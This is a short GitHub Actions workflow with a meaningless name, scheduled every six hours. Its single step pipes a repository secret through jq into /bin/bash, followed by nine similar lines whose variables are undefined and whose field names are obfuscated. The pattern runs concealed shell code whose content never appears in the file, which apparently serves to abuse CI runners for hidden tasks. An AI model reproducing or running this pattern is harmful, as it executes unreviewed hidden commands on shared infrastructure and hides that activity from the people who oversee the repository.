name: civilianattracted

on:
  workflow_dispatch:
  schedule:
    - cron: '38 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: civilianattracted
        env:
          i9: ${{ secrets.i9 }}
        run: |
          echo $i9 | jq -r .dt38190 | /bin/bash
          echo $d70 | jq -r .ezhf28 | /bin/bash
          echo $xp18 | jq -r .egjas91 | /bin/bash
          echo $x966 | jq -r .gdq99926 | /bin/bash
          echo $v8820 | jq -r .jzos11 | /bin/bash
          echo $s65 | jq -r .zd7788 | /bin/bash
          echo $xldgc50 | jq -r .hjkqq92545 | /bin/bash
          echo $ok84 | jq -r .tl064 | /bin/bash
          echo $q0470 | jq -r .lnujn19528 | /bin/bash
          echo $bgfk0 | jq -r .rv605 | /bin/bash

